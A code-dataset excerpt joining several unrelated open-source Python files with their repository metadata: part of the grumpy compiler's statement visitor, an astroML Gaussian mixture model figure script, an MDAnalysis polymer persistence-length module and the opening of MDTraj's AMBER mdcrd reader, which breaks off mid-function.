mod.expr, self.block.intern(name))
self.block.bind_var(
self.writer, alias.asname or alias.name, member.expr)
else:
# NOTE: Assume that the names being imported are all modules within a
# package. E.g. "from a.b import c" is importing the module c from package
# a.b, not some member of module b. We cannot distinguish between these
# two cases at compile time and the Google style guide forbids the latter
# so we support that use case only.
for alias in node.names:
name = '{}.{}'.format(node.module, alias.name)
with self._import(name, name.count('.')) as mod:
asname = alias.asname or alias.name
self.block.bind_var(self.writer, asname, mod.expr)
def visit_Module(self, node):
self._visit_each(node.body)
def visit_Pass(self, node):
self._write_py_context(node.lineno)
def visit_Print(self, node):
self._write_py_context(node.lineno)
with self.block.alloc_temp('[]*πg.Object') as args:
self.writer.write('{} = make([]*πg.Object, {})'.format(
args.expr, len(node.values)))
for i, v in enumerate(node.values):
with self.expr_visitor.visit(v) as arg:
self.writer.write('{}[{}] = {}'.format(args.expr, i, arg.expr))
self.writer.write_checked_call1('πg.Print(πF, {}, {})', args.expr,
'true' if node.nl else 'false')
def visit_Raise(self, node):
with self.expr_visitor.visit(node.type) if node.type else _nil_expr as t,\
self.expr_visitor.visit(node.inst) if node.inst else _nil_expr as inst,\
self.expr_visitor.visit(node.tback) if node.tback else _nil_expr as tb:
if node.inst:
assert node.type, 'raise had inst but no type'
if node.tback:
assert node.inst, 'raise had tback but no inst'
self._write_py_context(node.lineno)
self.writer.write('πE = πF.Raise({}, {}, {})'.format(
t.expr, inst.expr, tb.expr))
self.writer.write('continue')
def visit_Return(self, node):
assert isinstance(self.block, block.FunctionBlock)
self._write_py_context(node.lineno)
if self.block.is_generator and node.value:
raise util.ParseError(node, 'returning a value in a generator function')
if node.value:
with self.expr_visitor.visit(node.value) as value:
self.writer.write('return {}, nil'.format(value.expr))
else:
self.writer.write('return nil, nil')
def visit_TryExcept(self, node): # pylint: disable=g-doc-args
# The general structure generated by this method is shown below:
#
# checkpoints.Push(Except)
# <try body>
# Checkpoints.Pop()
# <else body>
# goto Done
# Except:
# <dispatch table>
# Handler1:
# <handler 1 body>
# goto Done
# Handler2:
# <handler 2 body>
# goto Done
# ...
# Done:
#
# The dispatch table maps the current exception to the appropriate handler
# label according to the exception clauses.
# Write the try body.
self._write_py_context(node.lineno)
except_label = self.block.genlabel(is_checkpoint=True)
done_label = self.block.genlabel()
self.writer.write('πF.PushCheckpoint({})'.format(except_label))
self._visit_each(node.body)
self.writer.write('πF.PopCheckpoint()')
if node.orelse:
self._visit_each(node.orelse)
self.writer.write('goto Label{}'.format(done_label))
with self.block.alloc_temp('*πg.BaseException') as exc:
if (len(node.handlers) == 1 and not node.handlers[0].type and
not node.orelse):
# When there's just a bare except, no dispatch is required.
self._write_except_block(except_label, exc.expr, node.handlers[0])
self.writer.write_label(done_label)
return
with self.block.alloc_temp('*πg.Traceback') as tb:
self.writer.write_label(except_label)
self.writer.write('{}, {} = πF.ExcInfo()'.format(exc.expr, tb.expr))
handler_labels = self._write_except_dispatcher(
exc.expr, tb.expr, node.handlers)
# Write the bodies of each of the except handlers.
for handler_label, except_node in zip(handler_labels, node.handlers):
self._write_except_block(handler_label, exc.expr, except_node)
self.writer.write('goto Label{}'.format(done_label))
self.writer.write_label(done_label)
def visit_TryFinally(self, node): # pylint: disable=g-doc-args
# The general structure generated by this method is shown below:
#
# Checkpoints.Push(Finally)
# <try body>
# Checkpoints.Pop()
# Finally:
# <finally body>
# Write the try body.
self._write_py_context(node.lineno)
finally_label = self.block.genlabel(is_checkpoint=True)
self.writer.write('πF.PushCheckpoint({})'.format(finally_label))
self._visit_each(node.body)
self.writer.write('πF.PopCheckpoint()')
# Write the finally body.
with self.block.alloc_temp('*πg.BaseException') as exc,\
self.block.alloc_temp('*πg.Traceback') as tb:
self.writer.write_label(finally_label)
self.writer.write('πE = nil')
self.writer.write('{}, {} = πF.RestoreExc(nil, nil)'.format(
exc.expr, tb.expr))
self._visit_each(node.finalbody)
self.writer.write_tmpl(textwrap.dedent("""\
if $exc != nil {
\tπE = πF.Raise($exc.ToObject(), nil, $tb.ToObject())
\tcontinue
}"""), exc=exc.expr, tb=tb.expr)
def visit_While(self, node):
loop = self.block.push_loop()
self._write_py_context(node.lineno)
self.writer.write_label(loop.start_label)
orelse_label = self.block.genlabel() if node.orelse else loop.end_label
with self.expr_visitor.visit(node.test) as cond,\
self.block.alloc_temp('bool') as is_true:
self.writer.write_checked_call2(is_true, 'πg.IsTrue(πF, {})', cond.expr)
self.writer.write_tmpl(textwrap.dedent("""\
if !$is_true {
\tgoto Label$orelse_label
}"""), is_true=is_true.expr, orelse_label=orelse_label)
self._visit_each(node.body)
self.writer.write('goto Label{}'.format(loop.start_label))
if node.orelse:
self.writer.write_label(orelse_label)
self._visit_each(node.orelse)
# Avoid label "defined and not used" in case there's no break statements.
self.writer.write('goto Label{}'.format(loop.end_label))
self.writer.write_label(loop.end_label)
self.block.pop_loop()
_AUG_ASSIGN_TEMPLATES = {
ast.Add: 'πg.IAdd(πF, {lhs}, {rhs})',
ast.BitAnd: 'πg.IAnd(πF, {lhs}, {rhs})',
ast.Div: 'πg.IDiv(πF, {lhs}, {rhs})',
ast.Mod: 'πg.IMod(πF, {lhs}, {rhs})',
ast.Mult: 'πg.IMul(πF, {lhs}, {rhs})',
ast.BitOr: 'πg.IOr(πF, {lhs}, {rhs})',
ast.Sub: 'πg.ISub(πF, {lhs}, {rhs})',
ast.BitXor: 'πg.IXor(πF, {lhs}, {rhs})',
}
def visit_With(self, node):
self._write_py_context(node.lineno)
# mgr := EXPR
with self.expr_visitor.visit(node.context_expr) as mgr,\
self.block.alloc_temp() as exit_func,\
self.block.alloc_temp() as value:
# The code here has a subtle twist: It gets the exit function attribute
# from the class, not from the object. This matches the pseudo code from
# PEP 343 exactly, and is very close to what CPython actually does. (The
# CPython implementation actually uses a special lookup which is performed
# on the object, but skips the instance dictionary: see ceval.c and
# lookup_maybe in typeobject.c.)
# exit := type(mgr).__exit__
self.writer.write_checked_call2(
exit_func, 'πg.GetAttr(πF, {}.Type().ToObject(), {}, nil)',
mgr.expr, self.block.intern('__exit__'))
# value := type(mgr).__enter__(mgr)
self.writer.write_checked_call2(
value, 'πg.GetAttr(πF, {}.Type().ToObject(), {}, nil)',
mgr.expr, self.block.intern('__enter__'))
self.writer.write_checked_call2(
value, '{}.Call(πF, πg.Args{{{}}}, nil)',
value.expr, mgr.expr)
finally_label = self.block.genlabel(is_checkpoint=True)
self.writer.write('πF.PushCheckpoint({})'.format(finally_label))
if node.optional_vars:
self._tie_target(node.optional_vars, value.expr)
self._visit_each(node.body)
self.writer.write('πF.PopCheckpoint()')
self.writer.write_label(finally_label)
with self.block.alloc_temp() as swallow_exc,\
self.block.alloc_temp('bool') as swallow_exc_bool,\
self.block.alloc_temp('*πg.BaseException') as exc,\
self.block.alloc_temp('*πg.Traceback') as tb,\
self.block.alloc_temp('*πg.Type') as t:
# temp := exit(mgr, *sys.exec_info())
tmpl = """\
$exc, $tb = πF.ExcInfo()
if $exc != nil {
\t$t = $exc.Type()
\tif $swallow_exc, πE = $exit_func.Call(πF, πg.Args{$mgr, $t.ToObject(), $exc.ToObject(), $tb.ToObject()}, nil); πE != nil {
\t\tcontinue
\t}
} else {
\tif $swallow_exc, πE = $exit_func.Call(πF, πg.Args{$mgr, πg.None, πg.None, πg.None}, nil); πE != nil {
\t\tcontinue
\t}
}
"""
self.writer.write_tmpl(
textwrap.dedent(tmpl), exc=exc.expr, tb=tb.expr, t=t.name,
mgr=mgr.expr, exit_func=exit_func.expr,
swallow_exc=swallow_exc.name)
# if Exc != nil && swallow_exc != true {
# Raise(nil, nil)
# }
self.writer.write_checked_call2(
swallow_exc_bool, 'πg.IsTrue(πF, {})', swallow_exc.expr)
self.writer.write_tmpl(textwrap.dedent("""\
if $exc != nil && $swallow_exc != true {
\tπE = πF.Raise(nil, nil, nil)
\tcontinue
}"""), exc=exc.expr, swallow_exc=swallow_exc_bool.expr)
def _assign_target(self, target, value):
if isinstance(target, ast.Name):
self.block.bind_var(self.writer, target.id, value)
elif isinstance(target, ast.Attribute):
assert isinstance(target.ctx, ast.Store)
with self.expr_visitor.visit(target.value) as obj:
self.writer.write_checked_call1(
'πg.SetAttr(πF, {}, {}, {})', obj.expr,
self.block.intern(target.attr), value)
elif isinstance(target, ast.Subscript):
assert isinstance(target.ctx, ast.Store)
with self.expr_visitor.visit(target.value) as mapping,\
self.expr_visitor.visit(target.slice) as index:
self.writer.write_checked_call1('πg.SetItem(πF, {}, {}, {})',
mapping.expr, index.expr, value)
else:
msg = 'assignment target not yet implemented: ' + type(target).__name__
raise util.ParseError(target, msg)
def _build_assign_target(self, target, assigns):
if isinstance(target, (ast.Tuple, ast.List)):
children = []
for elt in target.elts:
children.append(self._build_assign_target(elt, assigns))
tmpl = 'πg.TieTarget{Children: []πg.TieTarget{$children}}'
return string.Template(tmpl).substitute(children=', '.join(children))
temp = self.block.alloc_temp()
assigns.append((target, temp))
tmpl = 'πg.TieTarget{Target: &$temp}'
return string.Template(tmpl).substitute(temp=temp.name)
def _import(self, name, index):
"""Returns an expression for a Module object returned from ImportModule.
Args:
name: The fully qualified Python module name, e.g. foo.bar.
index: The element in the list of modules that this expression should
select. E.g. for 'foo.bar', 0 corresponds to the package foo and 1
corresponds to the module bar.
Returns:
A Go expression evaluating to an *Object (upcast from a *Module.)
"""
parts = name.split('.')
code_objs = []
for i in xrange(len(parts)):
package_name = '/'.join(parts[:i + 1])
if package_name != self.block.full_package_name:
package = self.block.add_import(package_name)
code_objs.append('{}.Code'.format(package.alias))
else:
code_objs.append('Code')
mod = self.block.alloc_temp()
with self.block.alloc_temp('[]*πg.Object') as mod_slice:
handles_expr = '[]*πg.Code{' + ', '.join(code_objs) + '}'
self.writer.write_checked_call2(
mod_slice, 'πg.ImportModule(πF, {}, {})',
util.go_str(name), handles_expr)
self.writer.write('{} = {}[{}]'.format(mod.name, mod_slice.expr, index))
return mod
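# e.g. self._import('foo.bar', 1) builds the []*πg.Code slice for packages
# foo and foo/bar, calls πg.ImportModule once, and selects element 1 (the
# module foo.bar); index 0 would instead select the parent package foo.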
def _import_native(self, name, values):
reflect_package = self.block.add_native_import('reflect')
package_name = name[len(_NATIVE_MODULE_PREFIX):].replace('.', '/')
package = self.block.add_native_import(package_name)
mod = self.block.alloc_temp()
with self.block.alloc_temp('map[string]*πg.Object') as members:
self.writer.write_tmpl('$members = map[string]*πg.Object{}',
members=members.name)
for v in values:
module_attr = v
with self.block.alloc_temp() as wrapped:
if v.startswith(_NATIVE_TYPE_PREFIX):
module_attr = v[len(_NATIVE_TYPE_PREFIX):]
with self.block.alloc_temp(
'{}.{}'.format(package.alias, module_attr)) as type_:
self.writer.write_checked_call2(
wrapped, 'πg.WrapNative(πF, {}.ValueOf({}))',
reflect_package.alias, type_.expr)
self.writer.write('{} = {}.Type().ToObject()'.format(
wrapped.name, wrapped.expr))
else:
self.writer.write_checked_call2(
wrapped, 'πg.WrapNative(πF, {}.ValueOf({}.{}))',
reflect_package.alias, package.alias, v)
self.writer.write('{}[{}] = {}'.format(
members.name, util.go_str(module_attr), wrapped.expr))
self.writer.write_checked_call2(mod, 'πg.ImportNativeModule(πF, {}, {})',
util.go_str(name), members.expr)
return mod
def _tie_target(self, target, value):
if isinstance(target, ast.Name):
self._assign_target(target, value)
return
assigns = []
self.writer.write_checked_call1(
'πg.Tie(πF, {}, {})',
self._build_assign_target(target, assigns), value)
for t, temp in assigns:
self._assign_target(t, temp.expr)
self.block.free_temp(temp)
def _visit_each(self, nodes):
for node in nodes:
self.visit(node)
def _write_except_block(self, label, exc, except_node):
self._write_py_context(except_node.lineno)
self.writer.write_label(label)
if except_node.name:
self.block.bind_var(self.writer, except_node.name.id,
'{}.ToObject()'.format(exc))
self._visit_each(except_node.body)
self.writer.write('πE = nil')
self.writer.write('πF.RestoreExc(nil, nil)')
def _write_except_dispatcher(self, exc, tb, handlers):
"""Outputs a Go code that jumps to the appropriate except handler.
Args:
exc: Go variable holding the current exception.
tb: Go variable holding the current exception's traceback.
handlers: A list of ast.ExceptHandler nodes.
Returns:
A list of Go label indexes corresponding to the exception handlers.
Raises:
ParseError: Except handlers are in an invalid order.
"""
handler_labels = []
for i, except_node in enumerate(handlers):
handler_labels.append(self.block.genlabel())
if except_node.type:
with self.expr_visitor.visit(except_node.type) as type_,\
self.block.alloc_temp('bool') as is_inst:
self.writer.write_checked_call2(
is_inst, 'πg.IsInstance(πF, {}.ToObject(), {})', exc, type_.expr)
self.writer.write_tmpl(textwrap.dedent("""\
if $is_inst {
\tgoto Label$label
}"""), is_inst=is_inst.expr, label=handler_labels[-1])
else:
# This is a bare except. It should be the last handler.
if i != len(handlers) - 1:
msg = "default 'except:' must be last"
raise util.ParseError(except_node, msg)
self.writer.write('goto Label{}'.format(handler_labels[-1]))
if handlers[-1].type:
# There's no bare except, so the fallback is to re-raise.
self.writer.write(
'πE = πF.Raise({}.ToObject(), nil, {}.ToObject())'.format(exc, tb))
self.writer.write('continue')
return handler_labels
def _write_py_context(self, lineno):
if lineno:
line = self.block.lines[lineno - 1].strip()
self.writer.write('// line {}: {}'.format(lineno, line))
self.writer.write('πF.SetLineno({})'.format(lineno))
|
AlexEKoren/grumpy
|
compiler/stmt.py
|
Python
|
apache-2.0
| 29,002
|
[
"VisIt"
] |
346e560c6db95c2cde8714c8f98c9d641e8620d42d893820262878ec78d5e881
|
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
from matplotlib import pyplot as plt
import numpy as np
from sklearn.mixture import GMM
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
#------------------------------------------------------------
# Set up the dataset.
# We'll use scikit-learn's Gaussian Mixture Model to sample
# data from a mixture of Gaussians. The usual way of using
# this involves fitting the mixture to data: we'll see that
# below. Here we'll set the internal means, covariances,
# and weights by-hand.
np.random.seed(1)
gmm = GMM(3, n_iter=1)
gmm.means_ = np.array([[-1], [0], [3]])
gmm.covars_ = np.array([[1.5], [1], [0.5]]) ** 2
gmm.weights_ = np.array([0.3, 0.5, 0.2])
X = gmm.sample(1000)
#------------------------------------------------------------
# Learn the best-fit GMM models
# Here we'll use GMM in the standard way: the fit() method
# uses an Expectation-Maximization approach to find the best
# mixture of Gaussians for the data
# fit models with 1-10 components
N = np.arange(1, 11)
models = [None for i in range(len(N))]
for i in range(len(N)):
models[i] = GMM(N[i]).fit(X)
# compute the AIC and the BIC
AIC = [m.aic(X) for m in models]
BIC = [m.bic(X) for m in models]
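# (For reference: AIC = 2k - 2 ln L and BIC = k ln(n) - 2 ln L for a model
# with k free parameters, sample size n and maximized likelihood L; the
# model minimizing the criterion is preferred, which is how M_best is
# selected below.)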
#------------------------------------------------------------
# Plot the results
# We'll use three panels:
# 1) data + best-fit mixture
# 2) AIC and BIC vs number of components
# 3) probability that a point came from each component
fig = plt.figure(figsize=(5, 1.7))
fig.subplots_adjust(left=0.12, right=0.97,
bottom=0.21, top=0.9, wspace=0.5)
# plot 1: data + best-fit mixture
ax = fig.add_subplot(131)
M_best = models[np.argmin(AIC)]
x = np.linspace(-6, 6, 1000)
logprob, responsibilities = M_best.eval(x)
pdf = np.exp(logprob)
pdf_individual = responsibilities * pdf[:, np.newaxis]
ax.hist(X, 30, normed=True, histtype='stepfilled', alpha=0.4)
ax.plot(x, pdf, '-k')
ax.plot(x, pdf_individual, '--k')
ax.text(0.04, 0.96, "Best-fit Mixture",
ha='left', va='top', transform=ax.transAxes)
ax.set_xlabel('$x$')
ax.set_ylabel('$p(x)$')
# plot 2: AIC and BIC
ax = fig.add_subplot(132)
ax.plot(N, AIC, '-k', label='AIC')
ax.plot(N, BIC, '--k', label='BIC')
ax.set_xlabel('n. components')
ax.set_ylabel('information criterion')
ax.legend(loc=2)
# plot 3: posterior probabilities for each component
ax = fig.add_subplot(133)
p = M_best.predict_proba(x)
p = p[:, (1, 0, 2)] # rearrange order so the plot looks better
p = p.cumsum(1).T
ax.fill_between(x, 0, p[0], color='gray', alpha=0.3)
ax.fill_between(x, p[0], p[1], color='gray', alpha=0.5)
ax.fill_between(x, p[1], 1, color='gray', alpha=0.7)
ax.set_xlim(-6, 6)
ax.set_ylim(0, 1)
ax.set_xlabel('$x$')
ax.set_ylabel(r'$p({\rm class}|x)$')
ax.text(-5, 0.3, 'class 1', rotation='vertical')
ax.text(0, 0.5, 'class 2', rotation='vertical')
ax.text(3, 0.3, 'class 3', rotation='vertical')
plt.show()
|
sniemi/EuclidVisibleInstrument
|
sandbox/GaussianMixtureModel.py
|
Python
|
bsd-2-clause
| 3,599
|
[
"Gaussian"
] |
31aae935ec53c129e15eb836dd8877dd700198d24f385b5b1f32b857cfc15ee7
|
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- http://www.mdanalysis.org
# Copyright (c) 2006-2016 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""
Polymer analysis --- :mod:`MDAnalysis.analysis.polymer`
=======================================================
:Author: Richard J. Gowers
:Year: 2015
:Copyright: GNU Public License v3
This module contains various commonly used tools in analysing polymers.
"""
from __future__ import division, absolute_import
from six.moves import range
import numpy as np
import logging
from .. import NoDataError
from ..lib.distances import calc_bonds
from .base import AnalysisBase
logger = logging.getLogger(__name__)
class PersistenceLength(AnalysisBase):
r"""Calculate the persistence length for polymer chains
The persistence length is the length at which two points on the polymer
chain become decorrelated.
Notes
-----
This analysis requires that the trajectory supports indexing
.. versionadded:: 0.13.0
"""
def __init__(self, atomgroups, **kwargs):
"""Calculate the persistence length for polymer chains
Parameters
----------
atomgroups : list
            List of atomgroups. Each atomgroup should represent a single
            polymer chain, with the atoms listed in order along the chain.
start : int, optional
First frame of trajectory to analyse, Default: None becomes 0.
        stop : int, optional
            Last frame of trajectory to analyse, Default: None becomes
            n_frames. Iteration stops *before* this frame number.
        step : int, optional
            Step between frames to analyse, Default: None becomes 1.
"""
super(PersistenceLength, self).__init__(
atomgroups[0].universe.trajectory, **kwargs)
self._atomgroups = atomgroups
# Check that all chains are the same length
lens = [len(ag) for ag in atomgroups]
chainlength = len(atomgroups[0])
if not all(l == chainlength for l in lens):
raise ValueError("Not all AtomGroups were the same size")
self._results = np.zeros(chainlength - 1, dtype=np.float32)
def _single_frame(self):
        # could optimise this by writing a "self dot array" function that
        # would accept a bunch of coordinates and spit out the decorrelation
        # for each; we're only using the upper triangle of np.inner
n = len(self._atomgroups[0])
for chain in self._atomgroups:
# Vector from each atom to next
vecs = chain.positions[1:] - chain.positions[:-1]
# Normalised to unit vectors
vecs /= np.sqrt((vecs * vecs).sum(axis=1))[:, None]
inner_pr = np.inner(vecs, vecs)
for i in range(n-1):
self._results[:(n-1)-i] += inner_pr[i, i:]
def _conclude(self):
n = len(self._atomgroups[0])
norm = np.linspace(n - 1, 1, n - 1)
norm *= len(self._atomgroups) * self.n_frames
self.results = self._results / norm
self._calc_bond_length()
def _calc_bond_length(self):
"""calculate average bond length"""
bs = []
for ag in self._atomgroups:
pos = ag.positions
b = calc_bonds(pos[:-1], pos[1:]).mean()
bs.append(b)
self.lb = np.mean(bs)
def perform_fit(self):
"""Fit the results to an exponential decay"""
try:
self.results
except AttributeError:
raise NoDataError("Use the run method first")
self.x = np.arange(len(self.results)) * self.lb
self.lp = fit_exponential_decay(self.x, self.results)
self.fit = np.exp(-self.x/self.lp)
def plot(self, ax=None):
"""Oooh fancy"""
import matplotlib.pyplot as plt
if ax is None:
ax = plt.gca()
ax.plot(self.x, self.results, 'ro', label='Result')
ax.plot(self.x, self.fit, label='Fit')
ax.set(xlabel='x', ylabel='C(x)', xlim=[0.0, 40 * self.lb])
ax.legend(loc='best')
return ax
def fit_exponential_decay(x, y):
r"""Fit a function to an exponential decay
.. math:: y = \exp(-x/a)
Parameters
----------
x, y : array_like
The two arrays of data
Returns
-------
a : float
The coefficient *a* for this decay
Notes
-----
    This function assumes that the data start at 1.0 and decay to 0.0.
    Requires scipy.
"""
from scipy.optimize import curve_fit
def expfunc(x, a):
return np.exp(-x/a)
a = curve_fit(expfunc, x, y)[0][0]
return a
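# A minimal usage sketch (the file names and the atom selection below are
# illustrative assumptions, not part of this module):
#
#     import MDAnalysis as mda
#     from MDAnalysis.analysis.polymer import PersistenceLength
#
#     u = mda.Universe('polymer.psf', 'polymer.dcd')
#     chains = [seg.atoms.select_atoms('name CA') for seg in u.segments]
#     pl = PersistenceLength(chains).run()
#     pl.perform_fit()       # fits C(x) = exp(-x/lp); sets pl.lp and pl.fit
#     print(pl.lb, pl.lp)    # mean bond length and persistence length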
|
kain88-de/mdanalysis
|
package/MDAnalysis/analysis/polymer.py
|
Python
|
gpl-2.0
| 5,509
|
[
"MDAnalysis"
] |
085605092323885aec24bf368d2c3110e72a4349a5cc535cd6dae3221e6c8c7f
|
##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2013 Stanford University and the Authors
#
# Authors: Robert McGibbon
# Contributors:
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
##############################################################################
# Imports
##############################################################################
from __future__ import print_function, division
import os
import itertools
import numpy as np
from mdtraj.utils import ensure_type, cast_indices, in_units_of
from mdtraj.formats.registry import _FormatRegistry
from mdtraj.utils.six import string_types, PY3
from mdtraj.utils.six.moves import xrange
__all__ = ['MDCRDTrajectoryFile', 'load_mdcrd']
##############################################################################
# Classes
##############################################################################
class _EOF(IOError):
pass
@_FormatRegistry.register_loader('.mdcrd')
@_FormatRegistry.register_loader('.crd')
def load_mdcrd(filename, top=None, stride=None, atom_indices=None, frame=None):
"""Load an AMBER mdcrd file.
Parameters
----------
filename : str
String filename of AMBER mdcrd file.
top : {str, Trajectory, Topology}
        The mdcrd format does not contain topology information. Pass in either
the path to a pdb file, a trajectory, or a topology to supply this
information.
stride : int, default=None
Only read every stride-th frame
atom_indices : array_like, optional
        If not None, then read only a subset of the atoms' coordinates from the
file.
frame : int, optional
Use this option to load only a single frame from a trajectory on disk.
If frame is None, the default, the entire trajectory will be loaded.
If supplied, ``stride`` will be ignored.
Returns
-------
trajectory : md.Trajectory
The resulting trajectory, as an md.Trajectory object.
See Also
--------
mdtraj.MDCRDTrajectoryFile : Low level interface to MDCRD files
"""
from mdtraj.core.trajectory import _parse_topology, Trajectory
    # we make it not required in the signature, but required here. Although this
    # is a little weird, it's good because this function is usually called by a
    # dispatch from load(), where top comes from **kwargs. So if it's not supplied
    # we want to give the user an informative error message.
if top is None:
raise ValueError('"top" argument is required for load_mdcrd')
if not isinstance(filename, string_types):
raise TypeError('filename must be of type string for load_mdcrd. '
'you supplied %s' % type(filename))
topology = _parse_topology(top)
atom_indices = cast_indices(atom_indices)
with MDCRDTrajectoryFile(filename, topology.n_atoms) as f:
if frame is not None:
f.seek(frame)
n_frames = 1
else:
n_frames = None
return f.read_as_traj(topology, n_frames=n_frames, stride=stride,
atom_indices=atom_indices)
@_FormatRegistry.register_fileobject('.mdcrd')
@_FormatRegistry.register_fileobject('.crd')
class MDCRDTrajectoryFile(object):
"""Interface for reading and writing to an AMBER mdcrd files.
This is a file-like object, that both reading or writing depending
on the `mode` flag. It implements the context manager protocol,
so you can also use it with the python 'with' statement.
The conventional units in the mdcrd file are angstroms. The format only
supports storing the cartesian coordinates and box lengths.
Parameters
----------
filename : str
The filename to open. A path to a file on disk.
n_atoms : int
The number of atoms in the system. This is _required_ when mode == 'r'
and irrelevant when mode == 'w'.
mode : {'r', 'w'}
The mode in which to open the file, either 'r' for read or 'w' for
write.
    has_box : {True, False, 'detect'}
Does the mdcrd file contain box length information? This is optional
when mode == 'r' (and irrelevant when mode == 'w'). The presence or
absence of box information can generally be inferred from the file,
but there might be corner cases in which this is not possible,
because of limitations in the mdcrd format.
force_overwrite : bool
If opened in write mode, and a file by the name of `filename` already
exists on disk, should we overwrite it?
"""
distance_unit = 'angstroms'
def __init__(self, filename, n_atoms=None, mode='r', has_box='detect',
force_overwrite=True):
"""Open an AMBER mdcrd file for reading/writing.
"""
self._is_open = False
self._filename = filename
self._n_atoms = n_atoms
self._mode = mode
self._w_has_box = None
self._frame_index = 0
self._has_box = has_box
        # track which line we're on. this is not essential, but it's useful
        # when reporting errors to the user to say what line it occurred on.
self._line_counter = 0
if has_box not in [True, False, "detect"]:
raise ValueError('has_box must be one of [True, False, "detect"]')
if mode == 'r':
if n_atoms is None:
raise ValueError('To open a mdcrd file in mode="r", you must '
'supply the number of atoms, "n_atoms"')
if not os.path.exists(filename):
raise IOError("The file '%s' doesn't exist" % filename)
self._fh = open(filename, 'rb')
self._is_open = True
self._fh.readline() # read comment
self._line_counter += 1
elif mode == 'w':
if os.path.exists(filename) and not force_overwrite:
raise IOError("The file '%s' already exists" % filename)
self._fh = open(filename, 'wb')
self._is_open = True
else:
raise ValueError('mode must be one of "r" or "w". '
'you supplied "%s"' % mode)
def close(self):
"""Close the mdcrd file"""
if self._is_open:
self._fh.close()
self._is_open = False
def __del__(self):
self.close()
def __enter__(self):
"Support the context manager protocol"
return self
def __exit__(self, *exc_info):
"Support the context manager protocol"
self.close()
def read_as_traj(self, topology, n_frames=None, stride=None, atom_indices=None):
"""Read a trajectory from a mdcrd file
Parameters
----------
topology : Topology
The system topology
n_frames : int, optional
If positive, then read only the next `n_frames` frames. Otherwise read all
of the frames in the file.
stride : np.ndarray, optional
Read only every stride-th frame.
atom_indices : array_like, optional
            If not None, then read only a subset of the atoms' coordinates from the
            file. This may be slightly slower than the standard read because it requires
            an extra copy, but will save memory.
Returns
-------
trajectory : Trajectory
A trajectory object containing the loaded portion of the file.
"""
from mdtraj.core.trajectory import Trajectory
if atom_indices is not None:
topology = topology.subset(atom_indices)
initial = int(self._frame_index)
xyz, cell_lengths = self.read(n_frames=n_frames, stride=stride, atom_indices=atom_indices)
if len(xyz) == 0:
return Trajectory(xyz=np.zeros((0, topology.n_atoms, 3)), topology=topology)
in_units_of(xyz, self.distance_unit, Trajectory._distance_unit, inplace=True)
in_units_of(cell_lengths, self.distance_unit, Trajectory._distance_unit, inplace=True)
if cell_lengths is None:
cell_angles = None
else:
            # Assume that it's a rectilinear box
cell_angles = 90.0 * np.ones_like(cell_lengths)
if stride is None:
stride = 1
time = (stride*np.arange(len(xyz))) + initial
t = Trajectory(xyz=xyz, topology=topology, time=time)
t.unitcell_lengths = cell_lengths
t.unitcell_angles = cell_angles
return t
def read(self, n_frames=None, stride=None, atom_indices=None):
"""Read data from a mdcrd file
Parameters
----------
n_frames : int, None
The number of frames you would like to read from the file.
If None, all of the remaining frames will be loaded.
stride : np.ndarray, optional
Read only every stride-th frame.
atom_indices : array_like, optional
            If not None, then read only a subset of the atoms' coordinates
from the file.
Returns
-------
xyz : np.ndarray, shape=(n_frames, n_atoms, 3), dtype=np.float32
The cartesian coordinates, in angstroms
cell_lengths : {np.ndarray, None}
If the file contains unitcell lengths, they will be returned as an
            array of shape=(n_frames, 3). Otherwise, cell_lengths will be
            None.
"""
if not self._mode == 'r':
raise ValueError('read() is only available when file is opened '
'in mode="r"')
if n_frames is None:
frame_counter = itertools.count()
else:
frame_counter = xrange(n_frames)
if stride is None:
stride = 1
coords, boxes = [], []
for i in frame_counter:
try:
coord, box = self._read()
if atom_indices is not None:
coord = coord[atom_indices, :]
except _EOF:
break
coords.append(coord)
boxes.append(box)
for j in range(stride - 1):
# throw away these frames
try:
self._read()
except _EOF:
break
coords = np.array(coords)
if all(b is None for b in boxes):
# if there was no box information in any frame, that's cool
return coords, None
if not all(b is not None for b in boxes):
# but if some of them had box information and others didn't
# that probably means there was a bug in the parsing.
raise IOError('Inconsistent box information. Try manually '
'setting has_box? Your mdcrd file might be '
'corrupt.')
return coords, np.array(boxes, dtype=np.float32)
def _read(self):
"Read a single frame"
i = 0
coords = np.empty(self._n_atoms*3, dtype=np.float32)
box = None
while i < self._n_atoms * 3:
line = self._fh.readline()
self._line_counter += 1
if line == b'':
raise _EOF()
try:
items = [float(line[j:j+8])
for j in range(0, len(line.rstrip()), 8)]
assert 0 < len(items) <= 10
except Exception:
raise IOError('mdcrd parse error on line %d of "%s". This file '
